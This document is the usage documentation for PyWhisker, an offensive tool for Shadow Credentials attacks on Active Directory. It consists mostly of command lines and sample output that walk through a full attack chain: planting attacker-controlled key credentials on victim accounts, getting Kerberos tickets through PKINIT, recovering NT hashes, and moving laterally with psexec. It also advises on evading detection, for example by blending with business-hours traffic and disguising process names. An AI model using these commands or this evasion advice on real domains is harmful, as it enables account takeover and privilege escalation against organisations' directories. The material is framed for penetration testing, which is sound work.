PyWhisker
PyWhisker is a Python implementation of Shadow Credentials attacks, allowing attackers to add Windows Hello for Business key credentials to Active Directory user or computer objects without knowing the target’s password. This enables PKINIT-based Kerberos pre-authentication to obtain a Ticket Granting Ticket (TGT).
Installation
Via pip
pip install pywhiskerFrom GitHub
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip install -r requirements.txt
python pywhisker.py -hDependencies
- ldap3 — LDAP operations and AD authentication
- dnfile — DNS name parsing
- impacket — Kerberos and network protocol support
- cryptography — Certificate and key handling
- asn1crypto — ASN.1 encoding/decoding
pip install ldap3 dnfile impacket cryptography asn1cryptoQuick Start
Basic Shadow Credentials Addition
pywhisker -d example.com -u attacker -p 'Password123' --target victim_user --action addList Existing Key Credentials
pywhisker -d example.com -u attacker -p 'Password123' --target victim_user --action listRemove a Specific Credential
pywhisker -d example.com -u attacker -p 'Password123' --target victim_user --action remove --device-id <GUID>How Shadow Credentials Work
Windows Hello for Business
Windows Hello for Business uses certificate-based authentication stored in the msDS-KeyCredentialLink multivalued attribute on AD objects. Each key credential contains:
- Public key certificate
- Device ID (GUID)
- Custom marshaled key credential data
msDS-KeyCredentialLink Attribute
This AD attribute stores Windows Hello device credentials as KeyCredential structures. PyWhisker manipulates this attribute to inject attacker-controlled certificates, enabling authentication without the original password.
PKINIT Pre-Authentication
With a certificate in msDS-KeyCredentialLink, an attacker can use Public Key Cryptography for Initial Authentication (PKINIT) to request a TGT from the Key Distribution Center (KDC) using the injected certificate and private key.
No Password Required
The attack bypasses password-based authentication entirely. Once the credential is added, the attacker controls the private key and can authenticate as the target without knowing their password or NT hash.
Actions
| Action | Purpose |
|---|---|
list | Enumerate existing key credentials on target object |
add | Inject a new Windows Hello key credential |
remove | Delete a specific credential by device ID |
clear | Remove all key credentials from target |
info | Display detailed information about a key credential |
List Action
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action listOutput displays device IDs and timestamps of existing credentials.
Add Action
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action addGenerates a self-signed certificate and PFX file containing both certificate and private key. Output includes:
- PFX file path
- PFX password (required for usage)
- Device ID of new credential
Remove Action
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action remove --device-id "12345678-1234-5678-1234-567812345678"Requires the exact device ID from a previous list operation.
Clear Action
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action clearRemoves all key credentials. Use cautiously to avoid disrupting legitimate Windows Hello enrollments.
Info Action
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action info --device-id "12345678-1234-5678-1234-567812345678"Displays credential creation time and cryptographic details.
Authentication Options
Username and Password
pywhisker -d example.com -u attacker -p 'MyPassword' --target victim --action addStandard AD credentials with write permissions to target object.
NT Hash (Pass-the-Hash)
pywhisker -d example.com -u attacker -H 'aad3b435b51404eeaad3b435b51404ee' --target victim --action addUse NT hash instead of plaintext password for authentication.
LDAPS (Encrypted LDAP)
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action add --use-ldapsUses LDAPS (port 636) for encrypted LDAP communication.
Domain Controller IP
pywhisker -d example.com -u attacker -p 'Password123' --target victim --dc-ip 192.168.1.10 --action addSpecify explicit DC IP instead of DNS resolution.
Kerberos Authentication
pywhisker -d example.com -u attacker -k --target victim --action addUses Kerberos authentication (requires valid TGT in cache via kinit).
Adding Shadow Credentials
Step 1: Inject Key Credential
pywhisker -d example.com -u attacker -p 'Password123' --target 'victim' --action addOutput:
[+] Generating certificate...
[+] Writing PFX to keyCredential.pfx
[+] PFX Password: AsDfGhJk1234!
[+] Device ID: 12345678-abcd-ef01-2345-6789abcdef01
[+] Key Credential added successfullyStep 2: Request TGT with PKINIT
Using PKINITtools (gettgtpkinit.py):
python gettgtpkinit.py -cert-pfx keyCredential.pfx -pfx-pass 'AsDfGhJk1234!' \
-domain-netbios EXAMPLE -user-ccache victim.ccache example.com victimOutputs Kerberos credential cache (.ccache file).
Step 3: Extract NT Hash
Using PKINITtools (getnthash.py):
python getnthash.py -key 'a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6' \
EXAMPLE/victim victim_tgt.ccacheRecovers the target’s NT hash from the TGT session key (if PKINIT succeeds).
Full Attack Chain
1. Obtain Compromised Credentials
Start with credentials of a user with Write permissions to the target object (Domain Admin, Account Operator, or via ACL abuse).
2. Add Shadow Credential
pywhisker -d example.com -u 'EXAMPLE\attacker' -p 'CompromisedPass' \
--target 'victim_user' --action addSave the output PFX file and password.
3. Request TGT via PKINIT
python gettgtpkinit.py -cert-pfx keyCredential.pfx -pfx-pass 'PFXPassword' \
-domain-netbios EXAMPLE -user-ccache victim.ccache example.com victim4. Use TGT for Authentication
export KRB5CCNAME=victim.ccache
psexec.py -k -no-pass EXAMPLE/victim@target-host.example.comOr dump the NT hash and perform pass-the-hash.
5. Clean Up
pywhisker -d example.com -u attacker -p 'Password123' \
--target victim --action remove --device-id 'GUID-FROM-STEP-2'Removing Credentials
Remove Single Credential
pywhisker -d example.com -u attacker -p 'Password123' --target victim \
--action remove --device-id '12345678-abcd-ef01-2345-6789abcdef01'Always clean up after engagement to avoid detection and system disruption.
Remove All Credentials
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action clearUse with caution; ensures no credentials remain but may affect legitimate users.
Verify Removal
pywhisker -d example.com -u attacker -p 'Password123' --target victim --action listConfirm target’s key credential list is empty.
Targeting Options
User Accounts
pywhisker -d example.com -u attacker -p 'Password123' --target 'user@example.com' --action addTarget individual user objects for privilege escalation.
Computer Accounts
pywhisker -d example.com -u attacker -p 'Password123' --target 'COMPUTER$' --action addTarget machine accounts for lateral movement and persistence.
Distinguished Name Format
pywhisker -d example.com -u attacker -p 'Password123' \
--target 'CN=victim,CN=Users,DC=example,DC=com' --action addUse full DN for clarity when sAMAccountName is ambiguous.
Troubleshooting
LDAP Connection Errors
Error: Connection error: [Errno 61] Connection refused
Solution: Verify domain controller IP, confirm port 389 (LDAP) or 636 (LDAPS) is accessible, check firewall rules.
pywhisker -d example.com -u attacker -p 'Password123' -dc-ip 192.168.1.10 \
--target victim --action addPermission Denied
Error: [!] Insufficient permissions to modify target object
Solution: Verify user has Write permissions to msDS-KeyCredentialLink. Check group membership (Domain Admin, Account Operators) or target ACLs.
Certificate Generation Failures
Error: [!] Failed to generate certificate
Solution: Ensure cryptography and asn1crypto are installed; reinstall dependencies.
pip install --upgrade cryptography asn1cryptoTarget Not Found
Error: [!] Target object not found in Active Directory
Solution: Verify target sAMAccountName exists; use --target 'DOMAIN\username' format or full DN.
pywhisker -d example.com -u attacker -p 'Password123' \
--target 'EXAMPLE\victim' --action listBest Practices
Operational Security
- Perform actions from compromised systems or secured jump hosts, not directly from attacker infrastructure
- Clean up credentials immediately after obtaining access
- Use LDAPS to encrypt LDAP traffic over the network
- Operate during normal business hours to blend with legitimate traffic
Privilege Requirements
- Ensure compromise provides sufficient AD permissions before attempting attacks
- Target users with high-value access (Domain Admins, database admins, backup operators)
- Consider ACL abuse to grant write permissions if not currently present
Detection Evasion
- Monitor for unusual msDS-KeyCredentialLink modifications in logs
- Legitimate Windows Hello enrollment appears as well-spaced credentials
- Multiple rapid credential additions may trigger alerts
- Use legitimate tool names in process execution if possible
Evidence Handling
- Document target DNs, device IDs, and timestamps for post-engagement cleanup
- Maintain records of all added credentials for systematic removal
- Test removal procedures in staging before production engagements
Related Tools
| Tool | Purpose |
|---|---|
| Certipy | Python framework for Active Directory certificate abuse; includes shadow credential operations |
| Whisker | .NET implementation of Shadow Credentials attacks |
| PKINITtools | gettgtpkinit.py and getnthash.py for PKINIT-based TGT requests and NT hash recovery |
| Rubeus | .NET tooling for Kerberos abuse; can work with PKINIT certificates |
| ntlmrelayx | Relay NTLM authentication; useful for credential harvesting in attack chains |
| Impacket | Network protocol library; underlying support for PyWhisker functionality |
References
- Microsoft: Windows Hello for Business technical overview
- Harmj0y’s research on Shadow Credentials and PKINIT attacks
- ShutdownRepo PyWhisker GitHub repository
- Certipy documentation on AD certificate abuse